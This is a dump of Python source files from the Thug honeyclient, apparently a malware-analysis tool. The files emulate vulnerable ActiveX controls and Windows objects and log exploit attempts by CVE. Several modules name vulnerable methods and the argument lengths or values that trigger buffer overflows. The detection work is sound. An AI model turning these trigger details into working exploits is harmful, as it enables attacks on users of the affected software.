log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6492")
def SetHandler(self, arg):
if str(arg) == "218959117":
log.ThugLogging.log_exploit_event(
self._window.url,
"iMesh IMWebControl ActiveX",
"Overflow in SetHandler",
cve="CVE-2007-6493",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6493")
| 807
|
Python
|
.py
| 22
| 28.409091
| 87
| 0.625483
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,024
|
Folder.py
|
buffer_thug/thug/ActiveX/modules/Folder.py
|
import logging
log = logging.getLogger("Thug")
ATTRIBUTES = {
"Normal": 0, # Normal file. No attributes are set.
"ReadOnly": 1, # Read-only file. Attribute is read/write.
"Hidden": 2, # Hidden file. Attribute is read/write.
"System": 4, # System file. Attribute is read/write.
"Volume": 8, # Disk drive volume label. Attribute is read-only.
"Directory": 16, # Folder or directory. Attribute is read-only.
"Archive": 32, # File has changed since last backup. Attribute is read/write.
"Alias": 1024, # Link or shortcut. Attribute is read-only.
"Compressed": 2048, # Compressed file. Attribute is read-only.
}
class Folder:
def __init__(self, filespec):
self.Path = filespec
self._Attributes = ATTRIBUTES["Directory"]
log.ThugLogging.add_behavior_warn(
f"[Folder ActiveX] Path = {self.Path}, Attributes = {self._Attributes}"
)
def getAttributes(self):
return self._Attributes
def setAttributes(self, key):
if key.lower() in (
"volume",
"directory",
"alias",
"compressed",
):
return
self._Attributes = ATTRIBUTES[key]
Attributes = property(getAttributes, setAttributes)
@property
def ShortPath(self):
_shortPath = []
for p in self.Path.split("\\"):
spfn = p if len(p) <= 8 else f"{p[:6]}~1"
_shortPath.append(spfn)
return "\\\\".join(_shortPath)
@property
def ShortName(self):
spath = self.Path.split("\\")
name = spath[-1]
if len(name) <= 8:
return name
return f"{name[:6]}~1"
@property
def Drive(self):
spath = self.Path.split("\\")
if spath[0].endswith(":"):
return spath[0]
return "C:"
def Copy(self, destination, overwrite=True):
log.ThugLogging.add_behavior_warn(
f"[Folder ActiveX] Copy({destination}, {overwrite})"
)
def Move(self, destination):
log.ThugLogging.add_behavior_warn(f"[Folder ActiveX] Move({destination})")
def Delete(self, force=False):
log.ThugLogging.add_behavior_warn(f"[Folder ActiveX] Delete({force})")
| 2,252
|
Python
|
.py
| 60
| 29.6
| 83
| 0.599908
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,025
|
XMLDOMParseError.py
|
buffer_thug/thug/ActiveX/modules/XMLDOMParseError.py
|
class XMLDOMParseError:
def __init__(self):
self._errorCode = 0
self._filepos = 0
self._line = 0
self._linepos = 0
self._reason = 0
self._srcText = ""
self._url = ""
@property
def errorCode(self): # pylint:disable=unused-variable
return self._errorCode
@property
def filepos(self): # pylint:disable=unused-variable
return self._filepos
@property
def line(self): # pylint:disable=unused-variable
return self._line
@property
def linepos(self): # pylint:disable=unused-variable
return self._linepos
@property
def reason(self): # pylint:disable=unused-variable
return self._reason
@property
def srcText(self): # pylint:disable=unused-variable
return self._srcText
@property
def url(self): # pylint:disable=unused-variable
return self._url
| 921
|
Python
|
.py
| 30
| 23.733333
| 58
| 0.631222
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,026
|
ShockwaveFlash12.py
|
buffer_thug/thug/ActiveX/modules/ShockwaveFlash12.py
|
import logging
log = logging.getLogger("Thug")
def GetVariable(self, arg): # pylint:disable=unused-argument
if arg in ("$version",):
version = ["0", "0", "0", "0"]
idx = 0
for p in log.ThugVulnModules.shockwave_flash.split("."):
version[idx] = p
idx += 1
return f"WIN {','.join(version)}"
return "" # pragma: no cover
| 390
|
Python
|
.py
| 11
| 28.090909
| 64
| 0.565684
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,027
|
RtspVaPgCtrl.py
|
buffer_thug/thug/ActiveX/modules/RtspVaPgCtrl.py
|
# RTSP MPEG4 SP Control 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetMP4Prefix(self, val):
self.__dict__["MP4Prefix"] = val
if len(val) > 128:
log.ThugLogging.log_exploit_event(
self._window.url,
"RTSP MPEG4 SP Control ActiveX",
"Overflow in MP4Prefix property",
)
log.ThugLogging.Shellcode.check_shellcode(val)
| 412
|
Python
|
.py
| 13
| 25.076923
| 54
| 0.642132
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,028
|
VLC.py
|
buffer_thug/thug/ActiveX/modules/VLC.py
|
# VLC ActiveX Control
# CVE-2007-4619, CVE-2007-6262
import logging
log = logging.getLogger("Thug")
def getVariable(self, arg):
if len(arg) > 255:
log.ThugLogging.log_exploit_event(
self._window.url, "VLC ActiveX", "getVariable Overflow", cve="CVE-2007-6262"
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
log.ThugLogging.Shellcode.check_shellcode(arg)
def setVariable(self, arg0, arg1):
if len(arg0) > 255 or len(arg1) > 255:
log.ThugLogging.log_exploit_event(
self._window.url, "VLC ActiveX", "setVariable Overflow", cve="CVE-2007-6262"
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
log.ThugLogging.Shellcode.check_shellcode(arg0)
log.ThugLogging.Shellcode.check_shellcode(arg1)
def addTarget(self, arg0, arg1, arg2, arg3):
if len(arg0) > 255 or len(arg1) > 255 or len(arg2) > 255 or len(arg3) > 255:
log.ThugLogging.log_exploit_event(
self._window.url, "VLC ActiveX", "addTarget Overflow", cve="CVE-2007-6262"
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
log.ThugLogging.Shellcode.check_shellcode(arg0)
log.ThugLogging.Shellcode.check_shellcode(arg1)
log.ThugLogging.Shellcode.check_shellcode(arg2)
log.ThugLogging.Shellcode.check_shellcode(arg3)
| 1,445
|
Python
|
.py
| 29
| 42.37931
| 88
| 0.684698
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,029
|
RealPlayer.py
|
buffer_thug/thug/ActiveX/modules/RealPlayer.py
|
# RealMedia RealPlayer Ierpplug.DLL ActiveX Control
# CVE-2007-5601
import logging
log = logging.getLogger("Thug")
def DoAutoUpdateRequest(self, arg0, arg1, arg2): # pylint:disable=unused-argument
if len(arg0) >= 32 or len(arg1) >= 32:
log.ThugLogging.log_exploit_event(
self._window.url,
"RealMedia RealPlayer Ierpplug.DLL ActiveX",
"Overflow in DoAutoUpdateRequest",
cve="CVE-2007-5601",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
log.ThugLogging.Shellcode.check_shellcode(arg0)
log.ThugLogging.Shellcode.check_shellcode(arg1)
def PlayerProperty(self, arg): # pylint:disable=unused-argument
if arg == "PRODUCTVERSION":
return "6.0.14.552"
if len(arg) > 1000:
log.ThugLogging.log_exploit_event(
self._window.url,
"RealMedia RealPlayer Ierpplug.DLL ActiveX",
"Overflow in PlayerProperty",
cve="CVE-2007-5601",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
log.ThugLogging.Shellcode.check_shellcode(arg)
return "" # pragma: no cover
def Import(self, arg):
if len(arg) > 0x8000:
log.ThugLogging.log_exploit_event(
self._window.url,
"RealMedia RealPlayer Ierpplug.DLL ActiveX",
"Overflow in Import",
cve="CVE-2007-5601",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
log.ThugLogging.Shellcode.check_shellcode(arg)
def SetConsole(self, val):
self.__dict__["Console"] = val
if len(val) >= 32:
log.ThugLogging.log_exploit_event(
self._window.url,
"RealMedia RealPlayer rmoc3260.DLL ActiveX",
"Overflow in Console property",
cve="CVE-2007-5601",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
log.ThugLogging.Shellcode.check_shellcode(val)
| 2,063
|
Python
|
.py
| 49
| 33.326531
| 87
| 0.643966
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,030
|
JetAudioDownloadFromMusicStore.py
|
buffer_thug/thug/ActiveX/modules/JetAudioDownloadFromMusicStore.py
|
# jetAudio "DownloadFromMusicStore()" Arbitrary File Download Vulnerability
# CVE-2007-4983
import logging
log = logging.getLogger("Thug")
def DownloadFromMusicStore(
self, url, dst, title, artist, album, genere, size, param1, param2
): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f"[JetAudio ActiveX] Downloading from URL {url} (saving locally as {dst})"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"JetAudio ActiveX",
"Downloading from URL",
cve="CVE-2007-4983",
data={"url": url, "file": dst},
forward=False,
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-4983")
try:
self._window._navigator.fetch(url, redirect_type="JetAudio exploit")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn("[JetAudio ActiveX] Fetch failed")
| 932
|
Python
|
.py
| 23
| 34.73913
| 83
| 0.693245
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,031
|
WScriptExec.py
|
buffer_thug/thug/ActiveX/modules/WScriptExec.py
|
import logging
import random
from thug.ActiveX.modules.TextStream import TextStream
log = logging.getLogger("Thug")
class WScriptExec:
def __init__(self):
self._StdIn = TextStream()
self._StdOut = TextStream()
self._StdErr = TextStream()
@property
def ExitCode(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting ExitCode")
return 0
@property
def ProcessID(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting ProcessID")
return random.randint(100, 65535)
@property
def Status(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting Status")
return 1
@property
def StdIn(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdIn")
return self._StdIn
@property
def StdOut(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdOut")
return self._StdOut
@property
def StdErr(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdErr")
return self._StdErr
def Terminate(self):
log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Terminate")
| 1,279
|
Python
|
.py
| 35
| 29.971429
| 88
| 0.69262
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,032
|
NCTAudioFile2.py
|
buffer_thug/thug/ActiveX/modules/NCTAudioFile2.py
|
# NCTsoft Products NCTAudioFile2 ActiveX Control
# CVE-2007-0018
import logging
log = logging.getLogger("Thug")
def SetFormatLikeSample(self, arg):
if len(arg) > 4000:
log.ThugLogging.log_exploit_event(
self._window.url,
"NCTAudioFile2 ActiveX",
"Overflow in SetFormatLikeSample",
cve="CVE-2007-0018",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-0018")
log.ThugLogging.Shellcode.check_shellcode(arg)
| 520
|
Python
|
.py
| 14
| 29.785714
| 87
| 0.672655
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,033
|
UniversalUpload.py
|
buffer_thug/thug/ActiveX/modules/UniversalUpload.py
|
# Universal HTTP File Upload (UUploaderSverD.dll - v6.0.0.35)
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def RemoveFileOrDir(self, arg0, arg1): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f"[Universal HTTP File Upload ActiveX] Deleting {arg0}"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Universal HTTP File Upload ActiveX",
"Deleting",
data={"filename": arg0},
forward=False,
)
| 502
|
Python
|
.py
| 15
| 27.933333
| 72
| 0.681159
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,034
|
SonicWallNetExtenderAddRouteEntry.py
|
buffer_thug/thug/ActiveX/modules/SonicWallNetExtenderAddRouteEntry.py
|
# SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control
# CVE-2007-5603 (AddRouteEntry)
import logging
log = logging.getLogger("Thug")
def AddRouteEntry(self, arg0, arg1):
if len(arg0) > 20 or len(arg1) > 20:
log.ThugLogging.log_exploit_event(
self._window.url,
"SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX",
"Overflow in AddRouteEntry",
cve="CVE-2007-5603",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5603")
log.ThugLogging.Shellcode.check_shellcode(arg0)
log.ThugLogging.Shellcode.check_shellcode(arg1)
| 646
|
Python
|
.py
| 15
| 35.6
| 87
| 0.686901
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,035
|
__init__.py
|
buffer_thug/thug/ActiveX/modules/System/__init__.py
|
__all__ = ["Collections", "IO", "Runtime", "Security", "Text"]
from . import Collections
from . import IO
from . import Runtime
from . import Security
from . import Text
| 171
|
Python
|
.py
| 6
| 27.333333
| 62
| 0.713415
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,036
|
MemoryStream.py
|
buffer_thug/thug/ActiveX/modules/System/IO/MemoryStream.py
|
import io
import logging
log = logging.getLogger("Thug")
def Write(self, buffer, offset=0, count=-1):
log.ThugLogging.add_behavior_warn("[System.IO.MemoryStream] Write")
buflen = count if count > -1 else len(buffer)
bufdat = buffer[: buflen - 1]
streamdata = self.stream.getvalue()
data = f"{streamdata[:offset]}{bufdat}{streamdata[offset:]}"
self.stream = io.BytesIO(data.encode())
self.Position = len(data)
| 443
|
Python
|
.py
| 11
| 36.181818
| 71
| 0.701878
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,037
|
ASCIIEncoding.py
|
buffer_thug/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
|
import logging
log = logging.getLogger("Thug")
def GetByteCount_2(self, chars):
count = len(chars.encode("utf-8"))
log.ThugLogging.add_behavior_warn(
f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}"
)
return count
def GetBytes_4(self, chars):
log.ThugLogging.add_behavior_warn("[System.Text.ASCIIEncoding] GetBytes_4")
return list(chars)
| 388
|
Python
|
.py
| 11
| 30.909091
| 79
| 0.72043
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,038
|
Activator.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Activator.py
|
class Activator:
def __init__(self, delegate):
self.delegate = delegate
def CreateInstance(self, Type):
pass
| 134
|
Python
|
.py
| 5
| 20.8
| 35
| 0.640625
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,039
|
Delegate.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Delegate.py
|
from .Activator import Activator
class Delegate:
def __init__(self, code):
self.code = code
def DynamicInvoke(self, args):
return Activator(self)
| 173
|
Python
|
.py
| 6
| 23.333333
| 34
| 0.676829
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,040
|
BinaryFormatter.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
|
import logging
from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
log = logging.getLogger("Thug")
def Deserialize_2(self, buf):
log.ThugLogging.add_behavior_warn(
"[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2"
)
data = buf.stream.getvalue()
return Delegate(data)
| 341
|
Python
|
.py
| 9
| 33.666667
| 88
| 0.770642
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,041
|
ArrayList.py
|
buffer_thug/thug/ActiveX/modules/System/Collections/ArrayList.py
|
import logging
log = logging.getLogger("Thug")
def Add(self, value):
log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] Add")
self.arraylist.append(value)
return self.arraylist.index(value)
def ToArray(self):
log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] ToArray")
return list(self.arraylist)
| 353
|
Python
|
.py
| 9
| 35.444444
| 79
| 0.769912
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,042
|
FromBase64Transform.py
|
buffer_thug/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
|
import base64
import logging
log = logging.getLogger("Thug")
def TransformFinalBlock(self, buffer, offset, count):
log.ThugLogging.add_behavior_warn(
"[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock"
)
return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
| 323
|
Python
|
.py
| 8
| 36.5
| 82
| 0.766026
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,043
|
OpaqueFilter.py
|
buffer_thug/thug/ThugAPI/OpaqueFilter.py
|
#!/usr/bin/env python
#
# OpaqueFilter.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
class OpaqueFilter(logging.Filter):
def filter(self, record):
return False
| 787
|
Python
|
.py
| 21
| 35.761905
| 70
| 0.777195
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,044
|
ThugAPI.py
|
buffer_thug/thug/ThugAPI/ThugAPI.py
|
#!/usr/bin/env python
#
# ThugAPI.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import sys
import logging
from urllib.parse import urlparse
import bs4
from zope.interface import implementer
import thug
from thug.DOM.W3C import w3c
from thug.DOM.DFT import DFT
from thug.DOM.Window import Window
from thug.DOM.HTTPSession import HTTPSession
from thug.DOM.HTMLInspector import HTMLInspector
from thug.DOM.MIMEHandler import MIMEHandler
from thug.DOM.SchemeHandler import SchemeHandler
from thug.WebTracking.WebTracking import WebTracking
from thug.Encoding.Encoding import Encoding
from thug.Magic.Magic import Magic
from thug.Logging.ThugLogging import ThugLogging
from thug.DOM.W3C.Core.DOMImplementation import DOMImplementation
from thug.DOM.JSEngine import JSEngine
from thug.Classifier.JSClassifier import JSClassifier
from thug.Classifier.VBSClassifier import VBSClassifier
from thug.Classifier.URLClassifier import URLClassifier
from thug.Classifier.HTMLClassifier import HTMLClassifier
from thug.Classifier.TextClassifier import TextClassifier
from thug.Classifier.CookieClassifier import CookieClassifier
from thug.Classifier.SampleClassifier import SampleClassifier
from thug.Classifier.ImageClassifier import ImageClassifier
from .IThugAPI import IThugAPI
from .ThugOpts import ThugOpts
from .Watchdog import Watchdog
from .OpaqueFilter import OpaqueFilter
from .abstractmethod import abstractmethod
from .ThugVulnModules import ThugVulnModules
log = logging.getLogger("Thug")
log.setLevel(logging.WARN)
@implementer(IThugAPI)
class ThugAPI:
def __init__(self, configuration_path=thug.__configuration_path__):
self.__init_conf(configuration_path)
self.__init_jsengine()
self.__init_pyhooks()
self.__init_core()
self.__init_objcache()
self.__init_urlobjects()
self.__init_classifiers()
self.__init_opaque_filter()
self.__init_trace()
def __init_conf(self, configuration_path):
log.configuration_path = configuration_path
log.personalities_path = (
thug.__personalities_path__ if configuration_path else None
)
def __init_jsengine(self):
log.JSEngine = JSEngine()
def __init_core(self):
log.ThugOpts = ThugOpts()
log.ThugVulnModules = ThugVulnModules()
log.MIMEHandler = MIMEHandler()
log.SchemeHandler = SchemeHandler()
log.Encoding = Encoding()
log.Magic = Magic()
log.WebTracking = WebTracking()
log.HTMLInspector = HTMLInspector()
def __init_urlobjects(self):
log.UrlObjects = {}
def __init_objcache(self):
log.Window = Window
log.DOMImplementation = DOMImplementation
def __init_classifiers(self):
log.HTMLClassifier = HTMLClassifier()
log.JSClassifier = JSClassifier()
log.VBSClassifier = VBSClassifier()
log.URLClassifier = URLClassifier()
log.SampleClassifier = SampleClassifier()
log.TextClassifier = TextClassifier()
log.CookieClassifier = CookieClassifier()
log.ImageClassifier = ImageClassifier()
self.classifiers_map = {
"html": log.HTMLClassifier,
"js": log.JSClassifier,
"vbs": log.VBSClassifier,
"url": log.URLClassifier,
"sample": log.SampleClassifier,
"cookie": log.CookieClassifier,
"text": log.TextClassifier,
"image": log.ImageClassifier,
}
def __init_pyhooks(self):
log.PyHooks = {}
def __init_trace(self):
log.Trace = None
def __init_opaque_filter(self):
self.opaque_filter = OpaqueFilter()
def __call__(self): # pragma: no cover
self.analyze()
def version(self):
print(
f"Thug "
f"{thug.__version__} "
f"(JS Engine: {thug.__jsengine__} v{thug.__jsengine_version__})"
)
sys.exit(0)
def get_useragent(self):
return log.ThugOpts.useragent
def set_useragent(self, useragent):
log.ThugOpts.useragent = useragent
def get_events(self):
return log.ThugOpts.events
def set_events(self, events):
log.ThugOpts.events = events
def get_delay(self):
return log.ThugOpts.delay
def set_delay(self, delay):
log.ThugOpts.delay = delay
def get_attachment(self):
return log.ThugOpts.attachment
def set_attachment(self):
log.ThugOpts.attachment = True
def get_image_processing(self):
return log.ThugOpts.image_processing
def set_image_processing(self):
log.ThugOpts.image_processing = True
def reset_image_processing(self):
log.ThugOpts.image_processing = False
def get_file_logging(self):
return log.ThugOpts.file_logging
def set_file_logging(self):
log.ThugOpts.file_logging = True
def get_json_logging(self):
return log.ThugOpts.json_logging
def set_json_logging(self):
log.ThugOpts.json_logging = True
def get_elasticsearch_logging(self):
return log.ThugOpts.elasticsearch_logging
def set_elasticsearch_logging(self):
log.ThugOpts.elasticsearch_logging = True
logging.getLogger("elasticsearch").setLevel(logging.ERROR)
def get_features_logging(self):
return log.ThugOpts.features_logging
def set_features_logging(self):
log.ThugOpts.features_logging = True
def reset_features_logging(self):
log.ThugOpts.features_logging = False
def get_referer(self):
return log.ThugOpts.referer
def set_referer(self, referer):
log.ThugOpts.referer = referer
def get_proxy(self):
return log.ThugOpts.proxy
def set_proxy(self, proxy):
log.ThugOpts.proxy = proxy
def get_raise_for_proxy(self):
return log.ThugOpts.raise_for_proxy
def set_raise_for_proxy(self, raise_for_proxy):
log.ThugOpts.raise_for_proxy = raise_for_proxy
def set_no_fetch(self):
log.ThugOpts.no_fetch = True
def enable_download_prevent(self):
log.ThugOpts.download_prevent = True
def disable_download_prevent(self):
log.ThugOpts.download_prevent = False
def set_verbose(self):
log.ThugOpts.verbose = True
log.setLevel(logging.INFO)
def set_debug(self):
log.ThugOpts.debug = True
log.setLevel(logging.DEBUG)
def set_ast_debug(self):
log.ThugOpts.ast_debug = True
def set_http_debug(self):
log.ThugOpts.http_debug += 1
def set_acropdf_pdf(self, acropdf_pdf):
log.ThugVulnModules.acropdf_pdf = acropdf_pdf
def disable_acropdf(self):
log.ThugVulnModules.disable_acropdf()
def set_shockwave_flash(self, shockwave):
log.ThugVulnModules.shockwave_flash = shockwave
def disable_shockwave_flash(self):
log.ThugVulnModules.disable_shockwave_flash()
def set_javaplugin(self, javaplugin):
log.ThugVulnModules.javaplugin = javaplugin
def disable_javaplugin(self):
log.ThugVulnModules.disable_javaplugin()
def set_silverlight(self, silverlight):
log.ThugVulnModules.silverlight = silverlight
def disable_silverlight(self):
log.ThugVulnModules.disable_silverlight()
def get_threshold(self):
return log.ThugOpts.threshold
def set_threshold(self, threshold):
log.ThugOpts.threshold = threshold
def get_extensive(self):
return log.ThugOpts.extensive
def set_extensive(self):
log.ThugOpts.extensive = True
def reset_extensive(self):
log.ThugOpts.extensive = False
def get_timeout(self):
return log.ThugOpts.timeout
def set_timeout(self, timeout):
log.ThugOpts.timeout = timeout
def get_connect_timeout(self):
return log.ThugOpts.connect_timeout
def set_connect_timeout(self, timeout):
log.ThugOpts.connect_timeout = timeout
def get_proxy_connect_timeout(self):
return log.ThugOpts.proxy_connect_timeout
def set_proxy_connect_timeout(self, timeout):
log.ThugOpts.proxy_connect_timeout = timeout
def get_broken_url(self):
return log.ThugOpts.broken_url
def set_broken_url(self):
log.ThugOpts.broken_url = True
def get_ssl_verify(self):
return log.ThugOpts.ssl_verify
def set_ssl_verify(self):
log.ThugOpts.ssl_verify = True
def get_web_tracking(self):
return log.ThugOpts.web_tracking
def set_web_tracking(self):
log.ThugOpts.web_tracking = True
def get_async_prefetch(self):
return log.ThugOpts.async_prefetch
def set_async_prefetch(self):
log.ThugOpts.async_prefetch = True
def reset_async_prefetch(self):
log.ThugOpts.async_prefetch = False
def disable_honeyagent(self):
log.ThugOpts.honeyagent = False
def enable_code_logging(self):
log.ThugOpts.code_logging = True
def disable_code_logging(self):
log.ThugOpts.code_logging = False
def enable_cert_logging(self):
log.ThugOpts.cert_logging = True
def disable_cert_logging(self):
log.ThugOpts.cert_logging = False
def enable_screenshot(self):
log.ThugOpts.screenshot = True
def disable_screenshot(self):
log.ThugOpts.screenshot = False
def enable_awis(self):
log.ThugOpts.awis = True
def disable_awis(self):
log.ThugOpts.awis = False
def log_init(self, url):
log.ThugLogging = ThugLogging()
log.ThugLogging.set_basedir(url)
def set_log_dir(self, logdir):
log.ThugLogging.set_absbasedir(logdir)
def set_log_output(self, output):
fh = logging.FileHandler(output)
log.addHandler(fh)
def set_log_quiet(self): # pragma: no cover
root = logging.getLogger()
for handler in root.handlers:
if isinstance(handler, logging.StreamHandler):
handler.addFilter(self.opaque_filter)
def set_log_verbose(self):
root = logging.getLogger()
for handler in root.handlers:
if isinstance(handler, logging.StreamHandler):
handler.removeFilter(self.opaque_filter)
def get_mongodb_address(self):
return log.ThugOpts.mongodb_address
def set_mongodb_address(self, mongodb_address):
log.ThugOpts.mongodb_address = mongodb_address
def add_htmlclassifier(self, rule):
log.HTMLClassifier.add_rule(rule)
def add_urlclassifier(self, rule):
log.URLClassifier.add_rule(rule)
def add_jsclassifier(self, rule):
log.JSClassifier.add_rule(rule)
def add_vbsclassifier(self, rule):
log.VBSClassifier.add_rule(rule)
def add_textclassifier(self, rule):
log.TextClassifier.add_rule(rule)
def add_cookieclassifier(self, rule):
log.CookieClassifier.add_rule(rule)
def add_sampleclassifier(self, rule):
log.SampleClassifier.add_rule(rule)
def add_imageclassifier(self, rule):
log.ImageClassifier.add_rule(rule)
def add_htmlfilter(self, f):
log.HTMLClassifier.add_filter(f)
def add_urlfilter(self, f):
log.URLClassifier.add_filter(f)
def add_jsfilter(self, f):
log.JSClassifier.add_filter(f)
def add_vbsfilter(self, f):
log.VBSClassifier.add_filter(f)
def add_textfilter(self, f):
log.TextClassifier.add_filter(f)
def add_cookiefilter(self, f):
log.CookieClassifier.add_filter(f)
def add_samplefilter(self, f):
log.SampleClassifier.add_filter(f)
def add_imagefilter(self, f):
log.ImageClassifier.add_filter(f)
def add_customclassifier(self, cls_type, method):
classifier_type = cls_type.lower().strip()
if classifier_type not in self.classifiers_map:
log.warning("Skipping unknown classifier type %s", cls_type)
return
self.classifiers_map[classifier_type].add_customclassifier(method)
def reset_customclassifiers(self):
for c in self.classifiers_map.values():
c.reset_customclassifiers()
def register_pyhook(self, module, method, hook):
if module not in log.PyHooks:
log.PyHooks[module] = {}
log.PyHooks[module][method] = hook
def log_event(self):
log.ThugLogging.log_event()
def watchdog_cb(self, signum, frame): # pragma: no cover
pass
def __reset_classifiers_matches(self):
for c in self.classifiers_map.values():
c.reset_matches()
def __run(self, window):
if log.Trace: # pragma: no cover
sys.settrace(log.Trace)
with log.JSEngine.JSLocker:
with Watchdog(log.ThugOpts.timeout, callback=self.watchdog_cb):
dft = DFT(window)
dft.run()
def run_local(self, url):
from bs4.element import NavigableString
from bs4.element import CData
from bs4.element import Script
from lxml.html import tostring
from lxml.html import builder as E
self.__reset_classifiers_matches()
log.last_url = None
log.last_url_fetched = None
log.ThugLogging.set_url(url)
log.ThugOpts.local = True
log.HTTPSession = HTTPSession()
with open(url, "r", encoding="utf-8") as fd:
content = fd.read()
extension = os.path.splitext(url)
if len(extension) > 1 and extension[1].lower() in (
".js",
".jse",
):
if not content.lstrip().startswith("<script"):
html = tostring(E.HTML(E.HEAD(), E.BODY(E.SCRIPT(content))))
else:
soup = bs4.BeautifulSoup(content, "html5lib")
try:
soup.html.unwrap()
except AttributeError: # pragma: no cover
pass
try:
soup.head.unwrap()
except AttributeError: # pragma: no cover
pass
try:
